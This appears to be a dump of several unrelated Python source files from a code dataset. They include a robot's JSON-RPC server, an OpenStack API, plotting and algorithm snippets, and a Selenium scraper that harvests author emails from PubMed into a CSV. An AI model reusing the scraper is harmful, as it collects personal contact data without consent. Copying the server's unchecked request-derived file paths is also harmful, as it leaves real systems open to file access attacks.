solution\n ugly_hack = '#!/usr/bin/env python\\n' \\\n '# -*- coding: utf-8 -*-\\n' \\\n 'def input(enquiry):\\n' \\\n ' print(enquiry + u\"\\u2504\")\\n' \\\n ' return globals()[\\'__builtins__\\'].input(\\'\\')\\n' \\\n 'exec(open(r\\'' + filename + '\\').read())'\n\n self._current_proc = subprocess.Popen(['python3', '-X utf8', '-c', ugly_hack],\n bufsize=1,\n stdin=subprocess.PIPE,\n stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT,\n encoding='utf-8',\n universal_newlines=True)\n self._is_running = True\n while True:\n output = self._current_proc.stdout.readline()\n if output == '' and self._current_proc.poll() is not None:\n break\n if output:\n # this is an input inquiry (https://en.wikipedia.org/wiki/Unicode_control_characters 0x2405 is ENQ)\n if output.endswith(\"\\u2504\\n\"):\n timeout_time = datetime.now() + timedelta(minutes=5)\n\n line = output.replace(\"\\u2504\\n\", \"\")\n self._log.put_input(line)\n\n while len(self._message_buffer_for_input) == 0:\n if datetime.now() >= timeout_time:\n self._message_buffer_for_input.append(\"Timeout!\\n\")\n break\n\n # I know that this is not the preferred method of communication with\n # sub processes, but communicate does not provide on demand communication as stdin/stdout does\n # but just collects all inputs and writes all outputs at the end\n self._current_proc.stdin.write(self._message_buffer_for_input.pop() + '\\n')\n else:\n file_error_string = 'File \"' + filename + '\", l'\n if output.find(file_error_string) != -1:\n error_detected = True\n # Replace the file error like 'File \"/tmp/execute.py\", line x, in'\n line = output.replace(file_error_string, '[red]Error: L')\n self._log.put_output(line)\n\n self._current_proc.poll()\n self._is_running = False\n if not error_detected:\n self._log.put_output('')\n self._log.put_output('[green]Done ...')\n\n # Wait until the queue is empty or the timout occurred\n timeout = 0\n while (self._log.empty() is False) and (timeout < 30):\n time.sleep(0.1)\n timeout += 1\n\n # ------------------------------------------------------------------------------------------------------------------\n # JSON RPC API Methods\n # ------------------------------------------------------------------------------------------------------------------\n\n def _get_version(self, rpc_request):\n \"\"\" Get the version of this project.\n \"\"\"\n try:\n rpc_response = self._get_rpc_response(rpc_request['id'])\n rpc_response['result'] = self._version\n json_dump = json.dumps(rpc_response)\n except Exception as ex:\n return self._return_error(rpc_request['id'], 'Could not determine version. (%s)' % str(ex))\n else:\n return json_dump\n\n def _get_robot_info(self, rpc_request):\n \"\"\" Get information about the individual robot\n \"\"\"\n try:\n hucon_name = socket.gethostname()\n net_interface_infos = {\n interface_name: HuConNetiface.get_info(interface_name)\n for interface_name in [\"br-wlan\", \"apcli0\"]\n }\n rpc_response = self._get_rpc_response(rpc_request['id'])\n rpc_response['result'] = {\n 'name': hucon_name,\n 'mac_address': net_interface_infos[\"br-wlan\"].mac_address,\n 'ipv4_addresses': [\n info.ipv4_address for info in net_interface_infos.values()\n ]\n }\n json_dump = json.dumps(rpc_response)\n except Exception as ex:\n return self._return_error(\n rpc_request['id'],\n 'Could not get robot info. (%s)' % str(ex)\n )\n return json_dump\n\n def _poll(self, rpc_request):\n \"\"\" Return the log messages to the browser.\n \"\"\"\n messages = self._log.get_messages()\n # noinspection PyBroadException\n try:\n rpc_response = self._get_rpc_response(rpc_request['id'])\n rpc_response['messages'] = messages\n json_dump = json.dumps(rpc_response, default=lambda x: x.serialize())\n except Exception:\n # The message could not transferred to the browser. So re queue it!\n self._log.requeue(messages)\n else:\n return json_dump\n\n def _get_file_list(self, rpc_request):\n \"\"\" Return the list of all files/folder to the browser.\n \"\"\"\n try:\n code_folder = os.path.join(self._CODE_ROOT, rpc_request['params'].strip('/\\\\'))\n example_folder = os.path.join(self._EXAMPLE_ROOT, rpc_request['params'].strip('/\\\\'))\n\n files_usercode = []\n rpc_response = self._get_rpc_response(rpc_request['id'])\n if os.path.exists(code_folder):\n files_usercode = os.listdir(code_folder)\n files_usercode.sort()\n files_examples = os.listdir(example_folder)\n files_examples.sort()\n rpc_response['result'] = files_examples + files_usercode\n rpc_response['result'].sort()\n json_dump = json.dumps(rpc_response)\n\n except Exception as e:\n return self._return_error(rpc_request['id'], 'Could not get a file list for the folder. (%s)' % str(e))\n else:\n return json_dump\n\n def _create_folder(self, rpc_request):\n \"\"\" Creates the folder on the device.\n \"\"\"\n try:\n new_folder = os.path.join(self._CODE_ROOT, rpc_request['params'].strip('/\\\\'))\n\n if not os.path.exists(new_folder):\n os.makedirs(new_folder)\n\n rpc_response = self._get_rpc_response(rpc_request['id'])\n json_dump = json.dumps(rpc_response)\n except Exception as ex:\n return self._return_error(rpc_request['id'], 'Could not create the folder. (%s)' % str(ex))\n else:\n return json_dump\n\n def _load_file(self, rpc_request):\n \"\"\" Return the content of the file back to the browser.\n \"\"\"\n try:\n # TODO: Extract file base path (examples/user code) from rpc call and remove this hack\n filename = os.path.join(self._CODE_ROOT, rpc_request['params'].strip('/\\\\'))\n if not os.path.exists(filename):\n filename = os.path.join(self._EXAMPLE_ROOT, rpc_request['params'].strip('/\\\\'))\n\n rpc_response = self._get_rpc_response(rpc_request['id'])\n f = open(filename, 'r')\n rpc_response['result'] = f.read()\n f.close()\n json_dump = json.dumps(rpc_response)\n except Exception as ex:\n return self._return_error(rpc_request['id'], 'Could not get the content of the file. (%s)' % str(ex))\n else:\n return json_dump\n\n def _save_file(self, rpc_request):\n \"\"\" Save the received content on the local disk.\n \"\"\"\n # Store all incoming data into the file.\n try:\n rpc_response = self._get_rpc_response(rpc_request['id'])\n filename = os.path.join(self._CODE_ROOT, rpc_request['params']['filename'].strip('/\\\\'))\n with open(filename, 'w') as file:\n file.writelines(rpc_request['params']['data'])\n rpc_response['result'] = 'File %s saved.' % rpc_request['params']['filename']\n json_dump = json.dumps(rpc_response)\n except Exception as ex:\n return self._return_error(rpc_request['id'], 'Could not save the content of the file. (%s)' % str(ex))\n else:\n return json_dump\n\n def _get_is_running(self, rpc_request):\n \"\"\" Get the current running state of the device\n \"\"\"\n try:\n rpc_response = self._get_rpc_response(rpc_request['id'])\n rpc_response['result'] = self._is_running\n json_dump = json.dumps(rpc_response)\n except Exception as ex:\n return self._return_error(rpc_request['id'],\n 'Could not determine if there is a program running. (%s)' % str(ex))\n else:\n return json_dump\n\n def _execute(self, rpc_request):\n \"\"\" Store the data on a local file and execute them.\n \"\"\"\n if self._is_running is False:\n try:\n self._is_running = True\n\n filename = os.path.join(tempfile.gettempdir(), 'execute.py')\n\n with open(filename, 'wt') as file:\n file.writelines(self._replace_hucon_requests(rpc_request['params']))\n file.close()\n\n # Wait for a while until the file is really closed before it can be executed.\n time.sleep(0.2)\n\n self._run_file(filename)\n\n except Exception as ex:\n self._log.put_output('Error: \"%s\" Trace: \"%s\"' % str(ex) % str(ex.__traceback__))\n\n self._is_running = False\n self._current_proc = None\n\n else:\n return self._return_error(rpc_request['id'], 'There is a program running.', 503)\n\n rpc_response = self._get_rpc_response(rpc_request['id'])\n return json.dumps(rpc_response)\n\n def _run(self, rpc_request):\n \"\"\" Run the file which is saved on the device\n \"\"\"\n if self._is_running is False:\n try:\n filename = os.path.join(self._CODE_ROOT, rpc_request['params'].strip('/\\\\'))\n\n self._is_running = True\n\n self._run_file(filename)\n\n except Exception as ex:\n self._log.put_output('Error: \"%s\" Trace: \"%s\"' % str(ex) % str(ex.__traceback__))\n\n self._is_running = False\n self._current_proc = None\n else:\n return self._return_error(rpc_request['id'], 'There is a program running.', 503)\n\n rpc_response = self._get_rpc_response(rpc_request['id'])\n return json.dumps(rpc_response)\n\n def _receive_input(self, rpc_request):\n \"\"\" Receives input from the client\n \"\"\"\n try:\n self._message_buffer_for_input.append(rpc_request['message'])\n except Exception as ex:\n return self._return_error(rpc_request['id'], 'Could not forward the input. (%s)' % str(ex))\n\n rpc_response = self._get_rpc_response(rpc_request['id'])\n return json.dumps(rpc_response)\n\n def _kill(self, rpc_request):\n \"\"\" Kill the current running process\n \"\"\"\n self._kill_process()\n\n rpc_response = self._get_rpc_response(rpc_request['id'])\n rpc_response['result'] = 'Application stopped.'\n return json.dumps(rpc_response)\n\n def _kill_process(self):\n if hasattr(signal, 'CTRL_C_EVENT'):\n sig_ctrl_c = signal.CTRL_C_EVENT\n else:\n sig_ctrl_c = signal.SIGINT\n\n signal_list = [sig_ctrl_c,\n sig_ctrl_c,\n signal.SIGTERM,\n signal.SIGABRT]\n for currentSignal in signal_list:\n if self._current_proc:\n # noinspection PyBroadException\n try:\n self._current_proc.send_signal(currentSignal)\n self._current_proc.wait(0.1)\n except Exception:\n pass\n\n if self._current_proc:\n # noinspection PyBroadException\n try:\n self._current_proc.kill()\n self._current_proc.wait(0.1)\n except Exception:\n pass\n\n if not self._current_proc:\n self._is_running = False\n\n def _get_possible_post_data(self, rpc_request):\n \"\"\" Return the json of available post data events.\n \"\"\"\n try:\n rpc_response = self._get_rpc_response(rpc_request['id'])\n with open(os.path.join(tempfile.gettempdir(), 'possible_events'), 'r') as file:\n rpc_response['result'] = json.load(file)\n file.close()\n except Exception as ex:\n return self._return_error(rpc_request['id'],\n 'Could not retrieve the list of possible events. (%s)' % str(ex), 500)\n else:\n return json.dumps(rpc_response)\n\n def _event(self, rpc_request):\n \"\"\" Fire the event on the device.\n \"\"\"\n if self._is_running:\n\n try:\n if os.name == 'nt':\n return self._return_error(rpc_request['id'], 'Could not set the event on windows machines.', 500)\n\n os.kill(self._current_proc.pid, signal.SIGRTMIN + rpc_request['params'])\n except Exception as ex:\n return self._return_error(rpc_request['id'], 'Could not set the event. (%s)' % str(ex), 503)\n else:\n return self._return_error(rpc_request['id'], 'There is no program running.', 503)\n\n rpc_response = self._get_rpc_response(rpc_request['id'])\n return json.dumps(rpc_response)\n\n def _check_update(self, rpc_request):\n \"\"\" Check if there is an update available.\n \"\"\"\n try:\n proc = subprocess.Popen(['bash', self._UPDATE_FILE, '-c'], bufsize=0, stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT, encoding='utf-8')\n\n while True:\n output = proc.stdout.readline()\n if output == '' and proc.poll() is not None:\n break\n if output:\n self._log.put_output(output.strip())\n proc.poll()\n\n rpc_response = self._get_rpc_response(rpc_request['id'])\n if proc.returncode == 1:\n rpc_response['result'] = True\n else:\n rpc_response['result'] = False\n except Exception as ex:\n return self._return_error(rpc_request['id'], 'Could not get a version. (%s)' % str(ex), 500)\n else:\n return json.dumps(rpc_response)\n\n def _update(self, rpc_request):\n \"\"\" Update all files from the project.\n \"\"\"\n try:\n # Update the system first.\n self._log.put_output('The system will be updated and needs a few seconds.\\n')\n proc = subprocess.Popen(['bash', self._UPDATE_FILE, '-u'], bufsize=0, stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT, encoding='utf-8')\n\n while True:\n output = proc.stdout.readline()\n if output == '' and proc.poll() is not None:\n break\n if output:\n self._log.put_output(output.strip())\n proc.poll()\n\n # Do a restart.\n proc = subprocess.Popen(['bash', self._UPDATE_FILE, '-r'], bufsize=0, stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT, encoding='utf-8')\n\n while True:\n output = proc.stdout.readline()\n if output == '' and proc.poll() is not None:\n break\n if output:\n self._log.put_output(output.strip())\n proc.poll()\n\n except Exception as ex:\n return self._return_error(rpc_request['id'], 'Could not perform an update. (%s)' % str(ex), 500)\n else:\n # This should never be reached in term of the system reboot\n return self._return_error(rpc_request['id'], 'Could not perform an update.', 500)\n\n def _shutdown(self, rpc_request):\n \"\"\" Shutdown the robot.\n \"\"\"\n try:\n self._log.put_output('The system will be shutdown.\\n')\n proc = subprocess.Popen(['bash', self._UPDATE_FILE, '-s'], bufsize=0, stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT, encoding='utf-8')\n\n while True:\n output = proc.stdout.readline()\n if output == '' and proc.poll() is not None:\n break\n if output:\n self._log.put_output(output.strip())\n proc.poll()\n except Exception as ex:\n return self._return_error(rpc_request['id'], 'Could not shutdown the system. (%s)' % str(ex), 500)\n else:\n # This should never be reached in term of the system shutdown.\n return self._return_error(rpc_request['id'], 'Could not shutdown the system.', 500)\n\n # Wireless settings section\n def _get_wifi_found(self, rpc_request):\n \"\"\"\n Scan for Wi-Fi networks and returns searched as rpc_response\n :param rpc_request:\n :return: rpc_response\n \"\"\"\n try:\n self._log.put_output('Search for WiFi.\\n')\n device = json.dumps({\"device\": \"ra0\"})\n wifi_scan_output = json.loads(\n subprocess.check_output(['ubus', 'call', 'onion', 'wifi-scan', device]).decode())\n rpc_response = self._get_rpc_response(rpc_request['id'])\n rpc_response['result'] = wifi_scan_output['results']\n except Exception as ex:\n return self._return_error(rpc_request['id'], 'Could not search for WiFi. (%s)' % str(ex), 500)\n else:\n return json.dumps(rpc_response)\n\n def _get_saved_wifi_networks(self, rpc_request):\n \"\"\"\n Returns saved networks as rpc_response\n :param rpc_request:\n :return: rpc_response\n \"\"\"\n try:\n self._log.put_output('Read WiFi Settings.\\n')\n wifi_disabled = self._wifi.is_wifi_disabled()\n wifi_output_list = self._wifi.get_saved_wifi_networks()\n rpc_response = self._get_rpc_response(rpc_request['id'])\n result = {\"wifi_list\": wifi_output_list, \"wifi_disabled\": wifi_disabled}\n rpc_response['result'] = result\n except Exception as ex:\n return self._return_error(rpc_request['id'], 'Could not read WiFi settings. (%s)' % str(ex), 500)\n else:\n return json.dumps(rpc_response)\n\n def _add_wifi(self, rpc_request):\n \"\"\"\n Add new Wi-Fi network to configuration\n :param rpc_request:\n :return: rpc_response\n \"\"\"\n try:\n self._log.put_output('Add new WiFi.\\n')\n self._wifi.add_wifi(ssid=rpc_request['params'][0],\n key=rpc_request['params'][1],\n encryption=rpc_request['params'][2])\n except Exception as ex:\n return self._return_error(rpc_request['id'], 'Could not add new WiFi network. (%s)' % str(ex), 500)\n else:\n rpc_response = self._get_rpc_response(rpc_request['id'])\n return json.dumps(rpc_response)\n\n def _move_wifi_up(self, rpc_request):\n \"\"\"\n Move Wi-Fi network up in priority list\n :param rpc_request:\n :return: rpc_response\n \"\"\"\n try:\n self._log.put_output('Move WiFi up.\\n')\n self._wifi.move_wifi_up(rpc_request['params'][0])\n except Exception as ex:\n return self._return_error(rpc_request['id'], 'Could not move WiFi network up. (%s)' % str(ex), 500)\n else:\n rpc_response = self._get_rpc_response(rpc_request['id'])\n return json.dumps(rpc_response)\n\n def _move_wifi_down(self, rpc_request):\n \"\"\"\n Move Wi-Fi network up in priority list\n :param rpc_request:\n :return: rpc_response\n \"\"\"\n try:\n self._log.put_output('Move WiFi down.\\n')\n self._wifi.move_wifi_down(rpc_request['params'][0])\n except Exception as ex:\n return self._return_error(rpc_request['id'], 'Could not move WiFi network down. (%s)' % str(ex), 500)\n else:\n rpc_response = self._get_rpc_response(rpc_request['id'])\n return json.dumps(rpc_response)\n\n def _remove_wifi(self, rpc_request):\n \"\"\"\n Remove Wi-Fi network from settings\n :param rpc_request:\n :return:\n \"\"\"\n try:\n self._log.put_output('Remove WiFi down.\\n')\n self._wifi.remove_wifi(rpc_request['params'][0])\n except Exception as ex:\n return self._return_error(rpc_request['id'], 'Could not remove WiFi network. (%s)' % str(ex), 500)\n else:\n rpc_response = self._get_rpc_response(rpc_request['id'])\n return json.dumps(rpc_response)\n\n def _connect_wifi(self, rpc_request):\n \"\"\"\n Connect selected Wi-Fi network\n :param rpc_request:\n :return: rpc_response\n \"\"\"\n try:\n self._log.put_output('Connect WiFi.\\n')\n self._wifi.connect_wifi(rpc_request['params'][0])\n except Exception as ex:\n return self._return_error(rpc_request['id'], 'Could not remove WiFi network. (%s)' % str(ex), 500)\n else:\n rpc_response = self._get_rpc_response(rpc_request['id'])\n return json.dumps(rpc_response)\n\n def _enable_sta_wifi(self, rpc_request):\n \"\"\"\n Enable STA radio\n :param rpc_request:\n :return: rpc_response\n \"\"\"\n try:\n self._log.put_output('Enable WiFi.\\n')\n self._wifi.enable_sta_wifi()\n except Exception as ex:\n return self._return_error(rpc_request['id'], 'Could not enable WiFi. (%s)' % str(ex), 500)\n else:\n rpc_response = self._get_rpc_response(rpc_request['id'])\n return json.dumps(rpc_response)\n\n def _disable_sta_wifi(self, rpc_request):\n \"\"\"\n Disable STA radio\n :param rpc_request:\n :return: rpc_response\n \"\"\"\n try:\n self._log.put_output('Disable WiFi.\\n')\n self._wifi.disable_sta_wifi()\n except Exception as ex:\n return self._return_error(rpc_request['id'], 'Could not disable WiFi. (%s)' % str(ex), 500)\n else:\n rpc_response = self._get_rpc_response(rpc_request['id'])\n return json.dumps(rpc_response)\n\n def _get_ap_settings(self, rpc_request):\n \"\"\"\n Returns AP Settings in rpc_response\n :param rpc_request:\n :return: rpc_response\n \"\"\"\n try:\n self._log.put_output('Get AP Settings.\\n')\n rpc_response = self._get_rpc_response(rpc_request['id'])\n rpc_response['result'] = self._wifi.get_ap_settings()\n except Exception as ex:\n return self._return_error(rpc_request['id'], 'Could not get AP settings. (%s)' % str(ex), 500)\n else:\n return json.dumps(rpc_response)\n\n def _enable_ap_wifi(self, rpc_request):\n \"\"\"\n Enable AP radio\n :param rpc_request:\n :return: rpc_response\n \"\"\"\n try:\n self._log.put_output('Enable AP WiFi.\\n')\n self._wifi.enable_ap_wifi()\n except Exception as ex:\n return self._return_error(rpc_request['id'], 'Could not enable AP WiFi. (%s)' % str(ex), 500)\n else:\n rpc_response = self._get_rpc_response(rpc_request['id'])\n return json.dumps(rpc_response)\n\n def _disable_ap_wifi(self, rpc_request):\n \"\"\"\n Disable AP radio\n :param rpc_request:\n :return: rpc_response\n \"\"\"\n try:\n self._log.put_output('Disable AP WiFi.\\n')\n self._wifi.disable_ap_wifi()\n except Exception as ex:\n return self._return_error(rpc_request['id'], 'Could not disable WiFi. (%s)' % str(ex), 500)\n else:\n rpc_response = self._get_rpc_response(rpc_request['id'])\n return json.dumps(rpc_response)\n\n def _set_ap_settings(self, rpc_request):\n \"\"\"\n Set AP WiFi settings\n :param rpc_request:\n :return: rpc_response\n \"\"\"\n try:\n self._log.put_output('Set AP WiFi Settings.\\n')\n self._wifi.set_ap_settings(ssid=rpc_request['params'][0],\n key=rpc_request['params'][1],\n encryption=rpc_request['params'][2],\n ip=rpc_request['params'][3])\n except Exception as ex:\n return self._return_error(rpc_request['id'], 'Could not configure AP WiFi settings. (%s)' % str(ex), 500)\n else:\n rpc_response = self._get_rpc_response(rpc_request['id'])\n return json.dumps(rpc_response)\n","repo_name":"basler/hucon","sub_path":"webserver/HuConJsonRpc.py","file_name":"HuConJsonRpc.py","file_ext":"py","file_size_in_byte":32278,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"40644476120","text":"# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom confspirator import groups as config_groups\nfrom confspirator import fields as config_fields\nfrom adjutant.api import utils\n\nfrom adjutant_moc.apis import base\n\n\nclass MocProjects(base.MocBaseApi):\n \"\"\"\n API Endpoint for applying, or listing accessible projects.\n \"\"\"\n\n url = r'^moc/Projects/?$'\n task_type = 'moc_create_project'\n\n config_group = config_groups.DynamicNameConfigGroup(\n children=[\n config_fields.BoolConfig(\n 'create_default_network',\n help_text='If set to faulse, overrides what is in setup_network.',\n default=True,\n sample_default=True,\n ),\n config_fields.StrConfig(\n 'region',\n help_text='Region for creating default network and quota.',\n default='RegionOne',\n sample_default='RegionOne'\n ),\n config_fields.StrConfig(\n \"project_domain_id\",\n help_text=\"Domain id for projects.\",\n default=\"default\",\n sample_default=\"Default\"\n ),\n ]\n )\n\n @utils.authenticated\n def post(self, request, format=None):\n request.data['email'] = request.keystone_user['username']\n request.data['region'] = self.config['region']\n request.data['domain_id'] = self.config['project_domain_id']\n\n if not self.config['create_default_network']:\n request.data['setup_network'] = False\n\n if 'project_name' not in request.data:\n message = 'Missing project_name in request.'\n self.logger.info(message)\n return self.response(message, 400)\n\n project = self.identity.find_project(\n request.data['project_name'], self.config.project_domain_id)\n if project:\n message = ('Project %s already exists.'\n % request.data['project_name'])\n self.logger.info(message)\n return self.response_error(message, 409)\n\n return self.create_task(request)\n\n @utils.authenticated\n def get(self, request, format=None):\n # List other projects that a user has access to, or has applied for.\n pass\n\n\nclass MocProjectServices(base.MocBaseApi):\n \"\"\"\n API Endpoint for listing and applying for more services to a project.\n \"\"\"\n\n url = r'^moc/Services/?$'\n\n @utils.authenticated\n def get(self, request, format=None):\n # List other projects that a user has access to, or has applied for.\n pass\n","repo_name":"CCI-MOC/adjutant-moc","sub_path":"adjutant_moc/apis/projects.py","file_name":"projects.py","file_ext":"py","file_size_in_byte":3097,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"5469266773","text":"\"\"\"Module containing animation1 plugin.\"\"\"\n\nfrom typing import TYPE_CHECKING, Any\n\nfrom nxscli_mpl.animation_mpl import IPluginAnimation\nfrom nxscli_mpl.plot_mpl import PlotDataAxesMpl, PluginAnimationCommonMpl\n\nif TYPE_CHECKING:\n from matplotlib.figure import Figure # type: ignore\n from matplotlib.lines import Line2D # type: ignore\n from nxscli.idata import PluginQueueData\n\n\n###############################################################################\n# Class: Animation1\n###############################################################################\n\n\nclass Animation1(PluginAnimationCommonMpl):\n \"\"\"Infinity animation with x axis extension.\"\"\"\n\n def __init__(\n self,\n fig: \"Figure\",\n pdata: PlotDataAxesMpl,\n qdata: \"PluginQueueData\",\n write: str,\n ) -> None:\n \"\"\"Initialzie an animtaion1 handler.\n\n :param fig: matplotlib Figure\n :param pdata: axes handler\n :param qdata: stream queue handler\n :param write: write path\n \"\"\"\n PluginAnimationCommonMpl.__init__(self, fig, pdata, qdata, write)\n\n def _animation_update(\n self, frame: tuple[list[Any], list[Any]], pdata: PlotDataAxesMpl\n ) -> \"Line2D\": # pragma: no cover\n \"\"\"Update an animation with dynamic scaling.\"\"\"\n # update sample\n pdata.xdata_extend(frame[0])\n pdata.ydata_extend(frame[1])\n\n # update y scale\n self.yscale_extend(frame[1], pdata)\n\n # update x scale\n self.xscale_extend(frame[0], pdata)\n\n # set new data\n i = 0\n for ln in pdata.lns:\n ln.set_data(pdata.xdata[i], pdata.ydata[i])\n i += 1\n\n return pdata.lns\n\n\n###############################################################################\n# Class: PluginAnimation1\n###############################################################################\n\n\nclass PluginAnimation1(IPluginAnimation):\n \"\"\"Infinity animation with x axis extension.\"\"\"\n\n def __init__(self) -> None:\n \"\"\"Initialize an animation1 plugin.\"\"\"\n IPluginAnimation.__init__(self)\n\n def _start(\n self,\n fig: \"Figure\",\n pdata: PlotDataAxesMpl,\n qdata: \"PluginQueueData\",\n kwargs: Any,\n ) -> PluginAnimationCommonMpl:\n \"\"\"Start an animation1 plugin.\"\"\"\n return Animation1(fig, pdata, qdata, kwargs[\"write\"])\n","repo_name":"railab/nxscli-mpl","sub_path":"src/nxscli_mpl/plugins/animation1.py","file_name":"animation1.py","file_ext":"py","file_size_in_byte":2392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26333092382","text":"from ListNode import *\nfrom typing import *\n\n\nclass Solution:\n def detectCycle(self, head: Optional[ListNode]) -> Optional[ListNode]:\n slow = head\n fast = head\n\n while fast and fast.next:\n fast = fast.next.next\n slow = slow.next\n if fast == slow:\n break\n\n if not fast or not fast.next:\n return None\n\n slow = head\n while slow != fast:\n fast = fast.next\n slow = slow.next\n return slow\n","repo_name":"zxw254470434/PythonStudy","sub_path":"Leetcode/142.py","file_name":"142.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19834940264","text":"# Python 3.6\n# This scraper extracts data like emails from a dynamic page, using selenium and saves it to csv\n\nimport re\nimport csv\nimport selenium\nfrom time import sleep\nfrom selenium import webdriver, common\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.common.proxy import *\n\ndef findEmail(driver): # This function searches for the email on the page\n\ttry:\n\t\texpand_button = driver.find_element_by_id(\"toggle-authors\")\n\t\texpand_button.click()\n\t\temail_text = driver.find_element_by_id(\"full-view-expanded-authors\").text\n\t\treturn email_text # Returning the text from the tag, which contains the emails\n\texcept Exception as e: # The website has different layouts so we adjust accordingly\n\t\tprint(e)\n\t\texpand_button = driver.find_element_by_id(\"toggle-authors\")\n\t\texpand_button.click()\n\t\temail_text = driver.find_element_by_css_selector(\"li[data-affiliation-id='affiliation-1']\").text\n\t\treturn email_text\n\t\t\n\ndef clickNextPage(driver):\n\t# Finds the button that goes to the next page and clicks it\n\tnext_button = driver.find_element_by_css_selector(\"span[class='arrow']\")\n\tActionChains(driver).move_to_element(next_button).click(next_button).perform()\n\ndef main(): # Runs the whole program\n\tsearch = 'brca1'\n\tpattern = re.compile(r'[\\w\\.-]+@[\\w\\.]+') # Th pattern that will extract the emails from the page\n\t# For the Selenium webdriver, the actual scraper\n\turl = f'https://pubmed.ncbi.nlm.nih.gov/?term={search}&sort=date' # URL to the specific page\n\topts = Options()\n\n\t# proxy = \"167.99.93.53:8080\" # If you have a working proxy, put it in here(optional)\n\t# opts.add_argument(f'--proxy-server={proxy}')\n\n\t# opts.set_headless()\n\t# assert opts.headless # Operating in headless mode. Currently not working\n\twith webdriver.Chrome(options=opts) as driver:\n\t\tdriver.get(url)\n\t\tsearch_result = driver.find_element_by_class_name('docsum-title')\n\t\tsearch_result.click()\n\n\t\twith open('emails.csv', 'a', newline='') as csvfile:\n\t\t\twriter_object = csv.writer(csvfile, delimiter=',')\n\t\t\twhile True: # or: for i in range(n): where n is the number of pages you want scraped\n\t\t\t\tsleep(1) # To let the CPU rest a bit\n\t\t\t\ttry:\n\t\t\t\t\temail_string = findEmail(driver)\n\t\t\t\t\t# Extracting the email from the string if there is any string at all\n\t\t\t\t\temails_found = pattern.findall(email_string) if email_string else None\n\t\t\t\t\tprint('emails found:', emails_found)\n\t\t\t\t\t# Cleaning the emails from possible dots at the end\n\t\t\t\t\temail_list = list(map(lambda x: x.strip('.'), emails_found)) if emails_found else None\n\t\t\t\t\tif email_list: # If we extracted any emails\n\t\t\t\t\t\twriter_object.writerow(email_list) # Writing to the csv\n\t\t\t\texcept Exception as e:\n\t\t\t\t\tprint('Caught Error:', e)\n\t\t\t\tfinally:\n\t\t\t\t\tclickNextPage(driver) # Even if there was an error, move to the next page\n\nmain()\n\n","repo_name":"Sory-Noroc/Web-Scrapers","sub_path":"Pubmed Scraper.py","file_name":"Pubmed Scraper.py","file_ext":"py","file_size_in_byte":2977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38444927672","text":"# The task was taken from this video\n# https://www.youtube.com/watch?v=Ifwf3DBN1sc\n# We want to spend all money and buy 2 different flavors\n\nmenu = {'Strawberry': 2,\n 'Blueberry': 7,\n 'Nutella': 13,\n 'Vanilla': 5,\n 'Banana': 4,\n 'Bublegum': 13,\n 'Chocolate': 5}\n\n\ndef buy_ace_cream(menu, total_money: int) -> list:\n difference_hash = {}\n\n # Create a hashmap with diff in the price\n for i, (item, price) in enumerate(menu.items()):\n diff = total_money - price\n difference_hash.setdefault(diff, []).append((item, i))\n\n results = set() # we need to take only unique combinations of flavors\n\n for i, (item, price) in enumerate(menu.items()):\n for j, pos in difference_hash.setdefault(price, []):\n if j != item: # check if it is not the same flavour\n results.add((min(i, pos), max(i, pos)))\n\n return list(results)\n\n\nexamples = [10, 13, 18, 4, 7, 101]\nfor total_money in examples:\n result = buy_ace_cream(menu, total_money)\n print('${0:4} -> {1}'.format(total_money, result))\n","repo_name":"TimurNurlygayanov/test-tasks-example","sub_path":"algs/ice_cream.py","file_name":"ice_cream.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"38994513510","text":"from django.db import models\n\n\nclass Journal(models.Model):\n students = models.PositiveSmallIntegerField(\n 'Количество студентов',\n )\n lessons = models.PositiveSmallIntegerField(\n 'Количество занятий'\n )\n\n class Meta:\n verbose_name = 'Журнал',\n verbose_name_plural = 'Журналы'\n\n\nclass CellImage(models.Model):\n SYMBOL_CHOICE = (\n ('0', '0'),\n ('1', '1'),\n ('2', '2'),\n ('3', '3'),\n ('4', '4'),\n ('5', '5'),\n ('н', 'н')\n )\n image = models.ImageField('Изображение')\n image_array = models.JSONField()\n symbol = models.CharField(\n 'Символ',\n choices=SYMBOL_CHOICE,\n max_length=1,\n blank=True\n )\n\n class Meta:\n verbose_name = 'Изображение ячейки (сырые данные)'\n verbose_name_plural = 'Изображения ячеек (сырые данные)'\n\n","repo_name":"AlexStr94/data_science_diplom","sub_path":"diplom/symbols_analyzer/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73596881193","text":"from json import dumps, loads\r\nfrom os import listdir, chdir, system, name\r\n\r\ndef menu():\r\n print(\"1_ Show all playlists\")\r\n print(\"2_ Create playlist\")\r\n print(\"3_ Modify playlist\")\r\n print(\"4_ Delete playlist\")\r\n print(\"5_ Exit\")\r\n\r\ndef printList(list):\r\n s = 0\r\n for i in list:\r\n print(str(s) + \"_ \" + i)\r\n s += 1\r\n\r\ndef createFile(n):\r\n with open(f\"{n}.json\", \"w\") as file:\r\n file.write('{}')\r\n\r\ndef deleteFile(n):\r\n if(name == \"nt\"):\r\n 